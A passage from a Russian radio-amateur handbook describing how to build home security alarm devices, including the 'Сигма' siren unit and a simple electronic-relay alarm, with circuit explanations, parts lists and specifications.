При изготовлении самодельного трансформатора в домашней мастерской следует обратить особое внимание на качество изоляции между слоями обмоточных проводов и между обмотками. Особенно тщательно надо изолировать экранную обмотку как от первичной, так и от вторичных обмоток. Вместо самодельного трансформатора питания в устройстве может быть использован унифицированный серии «Габарит», например трансформатор, имеющий повышенную степень надежности и долговечности типа ТПП 287-127/220-50, что крайне необходимо при длительной, иногда круглосуточной работе системы в ждущем режиме. Кроме этого сетевой понижающий трансформатор 77 обеспечивает заданные значения выпрямленного напряжения постоянного тока, гальваническую развязку вторичных цепей УС от высокого напряжения сети переменного тока, а также дополнительную электробезопасность при эксплуатации. На вторичных обмотках сетевого трансформатора действуют напряжения 5 и 15 В.
Выпрямитель УС собран по однофазной двухполупериодной мостовой схеме Греца на четырех выпрямительных диодах средней мощности VD2 — VD5. Выбор схемы этого выпрямителя обусловлен тем, что она обеспечивает повышенную частоту пульсации выпрямленного напряжения постоянного тока на выходе выпрямителя, низкое значение обратного напряжения на комплекте диодов, полное использование габаритной мощности сетевого трансформатора, оптимальный уровень кпд, возможность подключения выпрямителя к сети переменного тока без понижающего трансформатора. Но по сравнению с другими выпрямителями рассматриваемая схема имеет повышенную стоимость изготовления и невозможность установки выпрямительных диодов на радиаторы охлаждения без изоляционных прокладок. Выпрямитель УС работает на емкостный фильтр, собранный на конденсаторе С1, который сглаживает пульсации выпрямленного напряжения постоянного тока. На выходе выпрямительного устройства собран также индикатор перегрузки, в состав которого входят индикаторная лампа Н2 и проволочный резистор R1.
Выпрямленное и сглаженное фильтром напряжение постоянного тока подается на компенсационный стабилизатор напряжения последовательного действия, собранный на транзисторах VT1, VT2 и стабилитроне VD6. Резистор R3 позволяет плавно регулировать выходное напряжение на стабилизаторе в пределах от 2 до 12 В. Ток нагрузки при постоянном выходном напряжении обеспечивается в пределах от 250 до 300 мА. Регулирующим элементом в стабилизаторе напряжения является транзистор VT2, управляющим элементом — VT1, который включен как эмиттерный повторитель.
Электрическая цепочка, составленная из стабилитрона VD6 и резистора R2, стабилизирует напряжение на резисторе R4. Устройство сигнализации, являющееся нагрузкой, включено в эмиттерную цепь транзистора VT2, и потребляемый им ток течет через участок эмиттер — коллектор этого транзистора. В случае перегрузки или короткого замыкания в цепи электронной сирены ток возрастает, увеличивая падение напряжения на индикаторной лампе Н2 и резисторе R1. Сопротивление резистора R1 рассчитано таким образом, что при токе нагрузки до 200... 300 мА нить накала лампы Н2 начинает накаливаться, а при токе более 300 мА — ярко светиться. Конденсатор СЗ дополнительно сглаживает пульсации выпрямленного напряжения и является вторым емкостным фильтром. Резистор R5 установлен для того, чтобы и при отключенном устройстве охраны регулирующий транзистор работал бы как усилитель тока.
Собственно электронное УС включает в свой состав два таймера, собранных на ИМС DA1 и DA2, которые включены по схеме генераторов автоколебаний. Первый таймер работает на частоте примерно 3 Гц. Второй таймер-генератор работает на частоте до 1 кГц. ИМС DA2 вырабатывает выходные сигналы двух типов. С первого выхода ИМС ДА2 (вывод 3} снимается сигнал прямоугольной формы, а с двух других выходов (выводы 2 и б) — сигналы пилообразной формы, которые обеспечивают частотную модуляцию звукового сигнала на выходе УС.
Составной транзистор, образованный двумя транзисторами VT7 и VT8, а также резистор R14 обеспечивают заранее заданное и необходимое напряжение на конденсаторе Сб.
Выходной сигнал второго генератора, собранного на ИМС DA1, обеспечивается в виде последовательных импульсов длительностью от 90 до 100 мкс. Уровень и частота звукового сигнала на выходе можно изменять путем регулирования питающего напряжения. Пониженное напряжение дает возможность получить более высокий тон звучания.
Микропереключатели S3 — S6 устанавливаются скрытно на окнах, дверях, крышках, капотах охраняемых объектов, они должны включаться и замыкать сигнальную цепь независимо от их расположения на объектах. Все микропереключатели соединяются параллельно друг другу, что приводит к срабатыванию СОС при замыкании любого переключателя.
Изменение сопротивления резистора R15 дает возможность управлять частотой модуляции выходных сигналов, а изменение сопротивления резистора R12 позволяет управлять высотой тона звучания сирены. Значение сопротивления резистора R11 влияет на глубину модуляции сигнала. Транзистор VT5, стабилитрон VD7 резистор R6 обеспечивают установку необходимого питающего напряжения ИМС. С первого выхода ИМС DA2 (вывод 3) снимается напряжение в виде отрицательных импульсов, которое поступает на транзистор VT6, инвертируется и поступает на вход составного транзистора, собранного на VT3 и VT4. Этот составной транзистор обеспечивает усиление по мощности, необходимое для включения громкоговорителя ВА1 (или автомобильной сирены) при высоком уровне звукового сигнала. Все основные детали и комплектующие изделия УС типа «Сигма» смонтированы на плате, выполненной под печатный монтаж и изготовленной из фольгированного стеклотекстолита или гетинакса толщиной до 2 мм. Токонесущие проводники и контактные площадки на печатной плате выполнены прорезями в фольге и имеют ширину не менее 1,5 мм. Печатная плата с помощью четырех винтов с гайками и монтажных стоек высотой до 25 мм закрепляется на шасси в пластмассовом корпусе, который имеет крышку с вентиляционными отверстиями и лицевую панель. На этой панели монтируются выключатель питания S1, держатель сетевого плавкого предохранителя FI, сигнальные лампы H1 и Н2, ручки управления переменных резисторов и стрелочный ИП.
На боковую стенку корпуса выведены приборные малогабаритные контактные зажимы, переключатель S1 и сетевой шнур с электрическим соединителем X1.
В УС типа «Сигма» применяются следующие покупные комплектующие ЭРЭ и изделия: сетевой понижающий трансформатор питания 77 типа Ш броневой конструкции; ИМС DA1 типа КР1006ВИ1, DA2 — КР1006ВИ1; транзисторы VTI типа МП42Б, VT2 — П213, VT3 — КТ817В, VT4 — КТ630Д, VT5 — КТ3102Д, VT6 — КТ3107Б, VT7 — КТ3107Б, VT8 — КТ3102Д; выпрямительные диоды VD1 типа КД220Г, VD2 — VD5 — Д226; стабилитроны VD6 типа Д814Д, VD7 — Д814А;
конденсаторы С1 типа К50-3-25В-2000 мкФ, С2 — К50-3-25В-500 мкФ, СЗ — К50-3-25В-1000 мкФ, С4 — К10-7В-25В-Н90-0,01 мкФ, С5 — К50-3-25В-470 мкФ, С6 — К73-5-0.22 мкФ; резисторы R1 типа С5-35-ЗВТ-7 Ом, R2 — ВСа-0,5-360 Ом, R3 — СП4-2Ма-1Вт-10 кОм, R4 — ВСа-0,5-1 кОм, R5 — ВСа-0,5-1 кОм, R6 — ВСа-0,125-2,2 кОм, R7 — ВСа-0,125-2,2 кОм, R8 — ВСа-0,125-680 Ом, R9 — ВСа-0,125-2,2 кОм, R10 — ВСа-0,125-10 кОм, R11 — ВСа-0,125-2,2 кОм, R12 — ВСа-0,125-150 кОм, R13 — ВСа-0,125-18 кОм, R14 — ВСа-0,125-3,3 кОм, R15 — ВСа-0,125-1 МОм; громкоговоритель ВА1 типа 6ГД-6; аккумуляторная батарея GB1 с выходным напряжением 12 В (например, автомобильный аккумулятор или 10НКГ-10Д); предохранитель F1 типа ПМ-1-0,5 А; электрический соединитель X1 типа «вилка» с электрическим кабелем в двойной изоляции длиной 1,5 м; ИП РА1 типа 4200 постоянного тока, с точностью отсчета не ниже класса 1,5; переключатели S1 типа ТВ2-1-2, S2 — П1Т-1-1, S3 — S6 типа МП-7; индикаторные лампы HI типа МН-6,3-0,22 А, Н2 — МН-12В-0.26 А.
При монтаже, сборке, регулировке и ремонте электронного УС могут быть применены другие комплектующие ЭРЭ, не ухудшающие его основные электрические параметры и эксплуатационные характеристики. В частности, выпрямительные диоды тина Д226 можно заменить на диоды типов Д229, Д237А или на диодную сборку тина КЦ402Е; оксидные электролитические конденсаторы типа К50-3 — на К50-6, К50-12, К50-16, К50-20; резисторы тина ВСа — на МЛТ, ОМЛТ, МТ, С1-4, УЛИ, С2-8;
сигнальную лампу HI типа МН6, 3-0, 22 А — на лампы типов КИ-6-60, МН-6,3—0, 3 А; стабилитрон типа Д814Д — на Д813. В устройстве может быть применен любой звукоизлучатель с сопротивлением катушки 8 Ом.
Моточные данные сетевого самодельного трансформатора питания Т1 приведены в табл. 2. 5.
Здесь, видимо, целесообразно еще раз напомнить о необходимости соблюдать требования техники электро- и пожарной безопасности. Большинство элементов схемы устройства, и особенно подключенные к промышленной сети переменного тока, могут находиться под напряжением. Поэтому запрещается касаться схемы руками или инструментом с неизолированной рукояткой до тех пор, пока устройство не будет отключено от электрической сети.
Таблица 2. 5. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в устройстве сигнализации типа «Сигма»
Основные технические характеристики устройства сигнализации типа «Сигма»
Номинальное напряжение питающейсети
переменного тока, В.................... 220
Номинальная частота питающей сети переменного тока, Гц.............................50
Номинальное напряжение питания автономного
источника ХИТ, В..................... 12
Пределы изменения напряжения питающей сети переменного тока, при которых сохраняется устойчивая работоспособность УС, В......... 180... 240
Пределы изменения частоты питающей сети
переменного тока, Гц................... 49, 5... 50.5
Выходное стабилизированное напряжение БП (максимальное значение), В............... 15
Пределы регулирования выходного напряжения на стабилизаторе, В.................... 3... 15
Максимальный ток нагрузки, мА............. 300
Ток срабатывания защитного устройства, мА..... 400
Ток, потребляемый устройством в ждущем режиме холостого хода, мА, не более.......... 6
Коэффициент стабилизации напряжения постоянного тока, не менее..................... 200
Коэффициент нелинейных искажений питающей сети переменного тока, %, не более......... 12
Амплитуда пульсации стабилизированного напряжения постоянного тока, мВ, не более........ 8
Номинальная мощность УС, Вт, не менее....... 30
Выходная мощность звуковой сирены,Вт, не менее............................ 5
Максимальное количество контролируемых объектов охраны одновременно, шт.............. 20
Частота звуковых сигналов, Гц.............. 10... 20 000
Сопротивление изоляции токоведущих частей устройства между собой и между металлическим корпусом, МОм, не менее................ 10
Готовность устройства к эксплуатации после
включения электропитания, с.............. 1
Время срабатывания устройства после замыкания контактов переключателей, мс.......... 0, 2
Электрическая прочность изоляции токоведущих частей при нормальных условиях эксплуатации УС, В, не менее....................... 500
Вероятность безотказной работы УС при риске заказчика в =0, 92, не менее............... 0, 96
Срок службы устройства, ч, не менее.......... 5000
Помехозащищенность устройства, выполненною в металлическом корпусе при воздействии внешнего электромагнитного поля, дБ........ 100
кпд, %, не менее........................ 95
Рис. 2. 2. Принципиальная схема устройства сигнализации типа "Сигма".
2. 5. ПРОСТОЕ ЭЛЕКТРОННО-РЕЛЕЙНОЕ ОХРАННОЕ УСТРОЙСТВО
Рассматриваемое охранное устройство в комплекте, состоящем из БЭ, исполнительного устройства, датчиков и громкоговорящей установки, представляет собой но существу систему предупредительной сигнализации.
Электронно-релейное сторожевое устройство, включающее в свой состав два электромагнитных реле и современные ППП, предназначено для охраны различных объектов и в первую очередь жилых помещений от проникновения посторонних лиц. По договоренности с жильцами соседних квартир сигнальные элементы схемы могут быть установлены у них, чем достигается дополнительная охрана. Настоящее устройство может быть использовано для охраны хозяйственных построек на садово-огородных участках, гаражей, производственных помещений и автомобилей. Электропитание охранного устройства осуществляется от сети переменного тока напряжением 220 или 127 В частотой 50 Гц, а также от автономного источника питания напряжением 12 В. От аккумуляторной батареи устройство начинает работать сразу же после отключения от сети переменного тока. Устройство сохраняет работоспособность при напряжении электропитания от автономного источника от 9 до 15 В постоянного тока.
Принципиальная электрическая схема охранного устройства приведена на рис. 2. 4. Устройство включает в свой состав входные цепи, устройство подключения к источникам питания, сетевой понижающий трансформатор питания T1, полупроводниковый выпрямитель c емкостным фильтром, ПСН, электронное реле времени, сигнальный узел с исполнительным устройством и сигнальные цепи.
Конструкция охранного устройства должна предусматривать в своем составе не только отсек для установки внутреннего автономного источника питания, но и возможность подключения к выходным зажимным клеммам Х2 и ХЗ дополнительного источника питания постоянного тока. Допускается использовать в качестве встроенною источника электропитания аккумуляторы типа НКГЦ 35-1 или 10НКГ-10Д. Но предпочтительнее использовать, первый тип аккумулятора, так как он по своим габаритным размерам аналогичен элементам ХИТ типа 373.
В качестве дополнительного внешнего источника напряжением от 9 до 15 В постоянного тока может быть использован покупной БП с током нагрузки не менее 0,6 А и амплитудой пульсации выпрямленного напряжения не более 0,5 В, а также автомобильный аккумулятор с аналогичными параметрами. При этом в случае преднамеренного обесточения (отключения) внешнего электропитания устройство охраны автоматически переходит на автономное питание от встроенных батареи. При подключении внешнего источника необходимо соблюдать полярность. К контактному зажиму Х2 всегда подключается «плюс», а к зажиму Х.3 — «минус».
Входное устройство обеспечивает подключение системы к сети переменного тока напряжением 220 или 127 В частотой 50 Гц с помощью электрического соединителя X1 типа «вилка», который смонтирован с электрическим кабелем длиной от 1,5 до 2,3 м. Сетевые плавкие предохранители F1 и F2 защищают входные цени от коротких замыканий и перегрузок, которые могут возникнуть из-за неправильного монтажа или неисправности комплектующих ЭРЭ. Включение и выключение электропитания осуществляется двухполюсным переключателем S1. Параллельно первичной обмотке сетевого трансформатора включен конденсатор С1 в качестве помехоподавляющего фильтра. Сетевой понижающий трансформатор питания Т1 изготавливается на магнитопроводе типа Ш бро-
Таблица 2.7. Моточные данные сетевого понижающего трансформатора питания Т1, примененного в простом электронно-релейном охранном устройстве
невой конструкции. Трансформатор имеет одну катушку с тремя обмотками. Катушка устанавливается на центральном стержне магнитопровода, активная площадь поперечного сечения стали которого должна быть не менее 5 см2. Напряжение питания 220 В подается на выводы 1 и 3, напряжение 127 В — на выводы 1 и 2. На вторичной обмотке трансформатора в режиме холостого хода действует напряжение 13,3 В переменного тока. Моточные данные сетевого понижающего трансформатора питания Т1 приведены в табл. 2.7. Сетевой трансформатор кроме основной функции — трансформации напряжения до значения необходимого для работы охранного устройства — обеспечивает гальваническую развязку вторичных электронных цепей от сети переменного тока высокого напряжения и дополнительную электробезопасность при работе с низким вторичным напряжением.
Переменное напряжение со вторичной обмотки трансформатора поступает на полупроводниковый выпрямитель неуправляемого типа, собранный на четырех выпрямительных диодах VD1—VD4 по однофазной двухполупериодной мостовой схеме, которая имеет ряд преимуществ по сравнению с другими выпрямительными схемами. Выпрямитель дает на выходе повышенную частоту пульсации выпрямленного напряжения постоянного тока, пониженное обратное напряжение на комплекте выпрямительных диодов, обеспечивает полное использование габаритной мощности сетевого трансформатора. Одновременно выпрямители данного типа обладают и некоторыми недостатками: повышенными потерями, которые снижают общий кпд охранного устройства, повышенным расходом выпрямительных диодов — четыре вместо двух или одного, невозможностью установки диодов одинаковых типов на металлическом радиаторе без
изоляционных прокладок, более высокой стоимостью изготовления и повышенной технологической сложностью.
На выходе выпрямителя собран емкостный фильтр, сглаживающий пульсации выпрямленного напряжения постоянного тока. Выпрямитель работает на емкостную нагрузку, выполненную на оксидных электролитических конденсаторах С2 и СЗ.
Выпрямленное напряжение со сглаживающего фильтра подается на стабилизатор напряжения нерегулируемого параметрического типа, который собран па стабилитроне VD5 и транзисторе VT2. Резистор R6, включенный между эмиттером транзистора VT3 и базой транзистора VT2, поддерживает нормальный режим работы регулирующего транзистора при отключенных устройствах сигнализации и электронного реле времени. Транзистор VT2 работает в режиме эмиттерного повторителя. Выходное стабилизированное напряжение равно 12 В. Напряжение пульсации на выходе стабилизатора при токе нагрузки 100 мА не превышает 5 мВ.
В схеме БЭ охранного устройства собрана система защиты от перегрузок и коротких замыканий в цепях сигнализации и на выходе устройства в нагрузке. Система защиты включает в свой состав резисторы R1, R2, R3, транзистор VT1 и два электромагнитных реле K1 и К.2. Система защиты от коротких замыканий работает следующим образом. При перегрузке как только ток, протекающий через резистор R1, превысит установленное значение (от 100 мА и выше), открывается транзистор VT1 и напряжение поступает на электромагнитное реле К2. После срабатывания реле замыкаются его контакты К2.1, через которые напряжение питания подается на обмотку реле K7, это реле также срабатывает, его контакты K1.1 размыкаются и отключают нагрузку и электронную схему сигнализации от электропитания. В устройстве защиты предусмотрена сигнальная лампа Н2, которая обеспечивает более четкое срабатывание системы защиты и сигнализирует о перегрузке. Суммарный ток, протекающий через лампу Н2 и далее через стабилизатор напряжения и балластный резистор R3, при отсутствии нагрузки должен несколько превышать ток срабатывания защиты, в противном случае при коротком замыкании в нагрузке контакты электромагнитного реле K1 будут периодически замыкаться и размыкаться. Для
устранения этого явления необходимо провести регулировку подбором сопротивлений резисторов, входящих в указанную цепочку.
Реле времени охранного устройства собрано на транзисторах VT3, VT4, электромагнитном реле КЗ и стабилитронах VD6 и VD9. Сигнальное устройство выполнено на транзисторах VT5—VT8 и выпрямительных диодах VD7, VD8 и VD10.
На дверях и окнах устанавливаются переключатели S3, S4, контакты которых замыкаются при их открывании, что приводит к запуску реле времени. При выбранных номиналах комплектующих изделий и ЭРЭ, указанных на схеме, реле времени работает 20 мин. Одновременно с началом работы реле времени срабатывает устройство запуска электрического звонка и сигнального устройства. Тактовый генератор и генератор звуковой частоты обеспечивают генерирование периодически прерывающегося сигнала тревоги, подаваемого через громкоговорители, которые устанавливаются в различных точках охраняемых помещений и, как ранее указывалось, у соседей по этажу.
Проводку и монтаж всей охранной системы необходимо выполнять проводниками в прочной изоляции, в том числе от датчиков к БЭ и до сирены, выходная мощность которой достигает 5 Вт.
Отключение сигнального устройства осуществляется специальной кнопкой, расположение которой в помещении должно быть известно только его хозяевам. Общее отключение охранного устройства от источников питания обеспечивается переключателями S1 и S2. При этом переключатель S2 позволяет работать охранному устройству в дежурном режиме. Аккумуляторная батарея вступает в работу только в том случае, когда напряжение на ней больше напряжения, вырабатываемого стабилизатором напряжения. Включением контактов переключателей S2 и S8 аккумуляторная батарея может быть поставлена на подзарядку.
Относительно простое схемно-техническое решение и доступность приобретения примененных в охранном устройстве комплектующих изделий и ЭРЭ позволяют почти без трудностей повторить его даже начинающим радиолюбителям. Конструкция устройства должна быть выполнена по блочно-модульному типу с применением печатного и навесного монтажа.
При изготовлении охранного устройства использованы следующие комплектующие ЭРИ и ЭРЭ: сетевой понижающий трансформатор питания Т1 броневой конструкции типа Ш;
транзисторы VTI типа КТ342А, VТ2 — П1214В, VT3 — КТ201В, VT4 — П214Б, VT5 — П307А, VТ6 — КТ201Г, VT7 — КТ312Б, VT8 КТ201Г; выпрямительные диоды VD1—VD4 типа Д223А, VD7 - КД105Б, VD8 - КД105Б, VD10 — КД105Б, VD11-КД105Б, VD12 — Д237А; стабилитроны VD5 типа Д815Е, VD6 - Д814Д, VD9-Д814В; конденсаторы С1 типа МБМ-11-630В-0,1 мкФ, С2 — К50-6-25В-500 мкФ, СЗ -- К50-6-25В-500 мкФ, С4 — К10-7В-25В-0,0047 мкФ, С5 — К10-50-25В-1,5 мкФ, С6 — К50-6-16В-2200 мкФ, С7 — К50-6-16В-20 мкФ; резисторы R1 типа МЛТ-0,25-6,8 Ом, R2 — МЛТ-0,25-3,9 кОм, R3 — МЛТ-0,25-100 Ом, R4 — МЛТ-2-560 Ом, R5 — МЛТ-0,25-220 Ом, R6 — МЛТ-2-2,2 кОм, R7 — МЛТ-0,25-1,2 кОм, R8 — МЛТ-0,5-150 Ом, R9 — МЛТ-0,25-560 кОм, R10-МЛТ-0,25-240 кОм, R11 — МЛТ-0,25-560 Ом, R12 — МЛТ-0,25-6,8 кОм, R13 — МЛТ-0,5-150 кОм, R14 — МЛТ-0,5-12 кОм, R15 — МЛТ-0,5-47 кОм, R16 — МЛТ-2-47 кОм, R17 — СП4-1а-0,5Вт-2,0 МОм, R18 — СП4-1а-47 кОм; индикаторная лампа H1 типа МН-6,3-0,22А, Н2 — К6-60; переключатели S1 типа П2Т-1-1, S2 — П1Т-1-1, S3 — КМ1-1, S4 — КМ1-1, S5 — КМ1-1, S6 — П1Т-1-1, S7 — П1Т-1-1, S8 — ТВ2-1-2; предохранители F1 типа ПМ1-0.5A, F2 — ПМ1-0,5 А;
аккумуляторная батарея GB1 типа 12ЦНК-0.85 (или рекомендованные выше); электромагнитные реле К1 типа РЭС-10 (паспорт РС4.524.303), К2 — РЭС-15 (паспорт РС4.591.003), КЗ — РЭС-9; электрические соединители X1 типа «вилка» с электрическим кабелем с двойной изоляцией длиной не менее 1,5 м, Х2, ХЗ типа КМЗ-1; громкоговорители ВА1, ВА2, мотоциклетная сирена ВАЗ; исполнительный механизм ИМ1 (на схеме не показан) включается в работу контактами электромагнитного реле КЗ.2.
При регулировке и ремонте охранного устройства могут быть применены другие аналогичные комплектующие ЭРЭ, не ухудшающие его основные электрические параметры и эксплуатационные характеристики. Транзисторы типа КТ342А можно заменить на транзисторы типов КТ342Б, КТ342Г, КТ301В, КТ312Б, КТ315В, КТ315Г, транзистор типа П214В — на П214А, П214Б, П214Г, П215, транзистор типа КТ201Г — на КТ312Б; выпрямительные диоды типа Д223 — на Д226А, КД105 с любым буквенным индексом, диоды типа КД105Б — на Д220А;
резисторы типа МЛТ — на ВС, ВСа, ОМЛТ, УЛИ, МТ, С1-4; конденсаторы типа К50-6 — на К50-3, К50-12, К50-16, К50-20.
Регулировка охранного устройства .заключается в установке постоянного тока, протекающего через стабилитрон VD5, и тока срабатывания системы защиты подбором сопротивления резистора R1. Правильно собранное устройство работает сразу же после монтажа, обеспечивая все основные электрические характеристики.
В практической деятельности мастерам-радиолюбителям часто приходится выбирать и применять различные ИМ и устройства, электропитание которых может осуществляться или от сети переменного тока, или от вторичных автономных источников питания. В качестве ИМ в СОС используются осветительные и сигнальные лампы, акустические преобразователи и механические или электромеханические устройства автоматического действия. При этом количество таких устройств в одной СОС может колебаться от одного до нескольких десятков. В последнее время все чаще начинают применяться радиотехнические и радиоэлектронные излучатели и оповещатели, которые устанавливаются на охраняемых объектах и ЦПУ и работают в строго установленном диапазоне частот.
Для начинающих радиолюбителей достаточно сложной является задача правильного включения и срабатывания сторожевого устройства, надежная, устойчивая и долговечная работа исполнительных механизмов. Принципиально включение исполнительных механизмов в работу можно свести к нескольким простым схемам, которые рассматриваются ниже и могут быть использованы радиолюбителями.
Исполнительные механизмы работают в выходных цепях охранных устройств и должны выдавать информацию и обеспечивать надлежащую охрану объектов при условии, когда конкретные охраняемые помещения позволяют без каких-либо изменений использовать рассматриваемые в справочнике сторожевые устройства. Подача звуковых или мигающих оптических сигналов в большинстве случаев может быть осуществлена с помощью простых устройств, в которых формируются сигналы, показывающие состояние контролируемых помещений и объектов.
На рис. 2.5 даны принципиальные схемы возможных вариантов включения исполнительных устройств, которые могут быть применены в схемах охранной сигнализации. Включение ИМ в работу не зависит от примененного источника электропитания: сети переменного тока или ХИТ.
Рис. 2. 5. Принципиальные схемы включения исполнительных звуковых и световых
устройств.
На рис. 2. 4 исполнительное устройство ВАЗ показано в условном варианте включения, которое зависит от его электропитания переменным или постоянным током, от фактического значения напряжения питающей сети, а также от конструкции выбранного ИМ. Применив в качестве сторожевого сигнализатора динамическую головку ВА1, можно воспользоваться схемой, приведенной на рис. 2. 5, а.
Работает исполнительное устройство в автономном режиме питания от ХИТ напряжением 4, 5 В при замыкании контактов реле К1.1 и одновременном размыкании контактов К1.2. Сам сигнализатор собран, на четырех транзисторах VT1-VT4, которые образуют два мультивибратора. Первый мультивибратор собран на транзисторах VT3—VT4, второй — на VТ1—VT2.
Для изготовления сторожевого сигнализатора (рис. 2.5, а) использованы следующие комплектующие ЭРЭ: транзисторы VTI типа КТ316А, VT2 — ГТ402А, VT3 — КТ316А, VT4 — ГТ402А; резисторы R1 типа МЛТ-0,25-75 кОм, R2 — МЛТ-0,25-5,6 кОм, R3 — МЛТ-0,25-300 Ом, R4 — МЛТ-0,25-1 кОм, R5 — МЛТ-0,25-75 кОм, R6 — МЛТ-0,25-5,6 кОм, R7 — МЛТ-0,25-300 Ом, R8 — МЛТ-0,25-1 кОм; конденсаторы С1 типа К50-3-6В-10 мкФ, С2 — К50-3-6В-10 мкф, СЗ — К50-3-6В-50 мкФ, С4 — К10-7В-25В-0,068 мкФ. В качестве звукоизлучателя можно применить громкоговоритель с сопротивлением звуковой катушки до 10 Ом.
Если в качестве ИМ будет принят данный сигнализатор, то необходимо учитывать, что его работа осуществляется только после срабатывания реле КЗ электронно-релейного охранного устройства (рис. 2.4).
Па рис. 2.5, б рассматривается схема исполнительного устройства с промежуточным управлением включения индикаторной лампы и акустического излучателя звуковой частоты. Как видно из схемы, это устройство содержит понижающий трансформатор Т1, на вторичной обмотке которого должно действовать переменное напряжение в пределах 8...12 В; однофазный двухполупериодный мостовой выпрямитель, собранный на четырех диодах VD1, VD2, VD4, VD5 с емкостным фильтром, который выполнен на оксидном конденсаторе С2; электронное реле выдержки времени, собранное на двух транзисторах VT1 и VT2 и электромагнитном реле К1. Времязадающая цепочка R1, C1 и R2 определяет длительность горения индикаторной лампы H1.
Работает данное устройство следующим образом. После срабатывания электромагнитного реле КЗ (рис. 2. 4) его контакты К3.1 смыкаются и подают напряжение питания на сетевой трансформатор Т1.В это время подаемся акустический сигнал от сирены ВА1, начинает работать выпрямитель, постоянное напряжение которого заряжает конденсатор С2. Почти одновременно начинает заряжаться конденсатор C1 и после этого открывается составной транзистор и электромагнитное реле К1 срабатывает. Его контакты К.1.1 замыкаются и включают индикаторную лампу H1, контакты К1.2 подключают первичную обмотку понижающего трансформатора к сети питания. После того как основная схема (рис. 2.4) будет отключена и реле КЗ вновь разомкнет свои контакты КЗ.1, данное устройство будет продолжать работать.
Для отключения устройства необходимо разомкнуть контакты переключателя S1, который устанавливается скрытно.
При изготовлении исполнительного устройства использованы следующие комплектующие ЭРЭ: транзисторы VT1 типа КТ315Б, VT2 — КТ315Б; резисторы R1 типа МЛТ-0,25-510 кОм, R2 — МЛТ-0,25-1 МОм; выпрямительные диоды VD1—VD5 типа КД105Б; конденсаторы С1 типа К50-6-20В-500 мкФ, С2 — К50-6-20В-1000 мкФ; электромагнитное реле К1 типа РЭС32; сирена ВА1 с напряжением электропитания переменным током 220 В; лампа накаливания H1.
На рис. 2.5, в показана схема включения исполнительного устройства, представляющего собой генератор акустических сигналов.
Так же как и в ранее рассмотренных схемах, подключается данное устройство к источнику электропитания после срабатывания реле КЗ по схеме, приведенной на рис. 2.4.
При изготовлении данного устройства использованы следующие ЭРЭ: транзисторы VT1 типа МП20Б, VT2 — ГТ322Б, VT3 — ГТ322Б; резисторы R1 типа МЛТ-0,25-100 Ом, R2 — МЛТ-0,25-2,7 кОм, R3 — МЛТ-0,25-1,5 кОм, R4 — МЛТ-0,25-150 Ом, R5, R6 — МЛТ-0,5-10 кОм, R7 — МЛТ-0,25-1,5 кОм;
конденсаторы С1, С2 типа К10-17-25В-0,47 мкФ; лампа накаливания Н1 с номинальным напряжением питания 220 В; электрические соединители X1—Х4 типа КМЗ-1 приборные; громкоговоритель с сопротивлением звуковой катушки 15 Ом.
После срабатывания электромагнитного реле КЗ (рис. 2.4) его контакты КЗ.1 и КЗ.2 замыкаются, подавая напряжение питания на сигнальное устройство. Источником питания может служить аккумуляторная батарея или другой ХИТ, который подключается в точках А и Б с соблюдением указанной на схеме полярности. Схема представляет собой мультивибратор, собранный на транзисторах VT2, VT3, с оконечным каскадом для получения акустического сигнала на транзисторе VT1. В мультивибраторе можно использовать практически любые германиевые транзисторы низкой и высокой частоты и коэффициентом передачи тока не менее 40...50, например ГТ322Б, МП21Д, ГТ109Г, ГТ308Б, ГТ309Г, ГТ309Е (VT2, VT3), а также МП21Д, МП25Б, МП26Б, МП41, МП42Б (VTI).
Ток на оконечный каскад подается только на время генерирования сигнала. Для запуска генератора контакты ХЗ и Х4 замыкаются одновременно с замыканием контактов переключателя S1, который устанавливается на входной двери.
Основные электрические параметры и технические характеристики простого электронно-релейного сторожевого устройства
Номинальное напряжение питающей сети переменного тока, В ....................... .220 или 127
Номинальная частота питающей сети переменного тока, Гц ........................ .50
Номинальное напряжение встроенного автономного источника питания, В ............... .12
Пределы изменения напряжения питающей сети
переменного тока, В .................... .187...242 или ................................... .110...140
Пределы изменения частоты питающей сети переменного тока, Гц ..................... .49,5...50,5
Пределы изменения напряжения автономного
источника питания постоянного тока, В ....... .9...15
Напряжение переменного тока на вторичных обмотках сетевого трансформатора. В:
на выводах 5 и б ................... 6
на выводах 7 и 8 ................... 13,3
Выходное стабилизированное напряжение, В ..... .12
Коэффициент нелинейных искажений питающей сети переменного тока, %, не более ......... .10
Коэффициент стабилизации напряжения постоянного тока, не менее .................... .150
Амплитуда пульсации выпрямленного напряжения после стабилизации, мВ, не более .......... .6
Ток, потребляемый устройством в дежурном режиме работы, мА, не более ............... .4
Время срабатывания устройства, мс, не более.... 30
Мощность, потребляемая устройством при полной
нагрузке, Вт, не более.................. 60
Время непрерывной работы тревожного сигнала
после срабатывания, мин, не менее.......... 15
Количество одновременно охраняемых объектов,
шт, в пределах....................... 1... 10
Номинальная выходная мощность на громкоговорителях, Вт....................... 15
Сопротивление изоляции токоведущих частей устройства между собой и металлическим корпусом устройства, МОм, не менее........ 10
Помехозащищенность устройства в металлическом корпусе при воздействии внешнего электромагнитного поля, дБ, не менее............... 120
Срок службы устройства, ч, не менее.......... 5000
Вероятность безотказной работы устройства
при риске заказчика в=0, 9, не менее ....... 0,97
кпд, %, не менее ....................... 75
Рис. 2. 4. Принципиальная схема простого электронно-релейного охранного устройства.
2. 6. ЭЛЕКТРОННОЕ УСТРОЙСТВО ОХРАНЫ И СИГНАЛИЗАЦИИ НА ОДНОЙ МИКРОСХЕМЕ
Данное устройство представляет собой электронную сирену с большой выходной мощностью, оповещающую о несанкционированном вторжении в охраняемое помещение. Устройство срабатывает при открывании дверей или окон, на которых установлены конечные выключатели, работающие на замыкание контактов. Оно предназначено для охраны объектов бытового и промышленного назначения, может быть использовано для охраны автомобилей и других различных транспортных средств, если электропитание электронных цепей осуществлять от автономных источников питания, ХИТ или от бортовой электросети этих средств. Например, устройство можно установить на катере, яхте, трейлере и т. д. Простота схемно-технического и конструктивно-технологического решений и минимальное количество широко применяемых комплектующих ЭРИ и ЭРЭ делают это устройство легко доступным для изготовления в радиолюбительской лаборатории. Устройство не критично к применяемым комплектующим ЭРЭ и допускает многочисленные замены деталей и узлов без ухудшения качества работы и эксплуатационных характеристик.
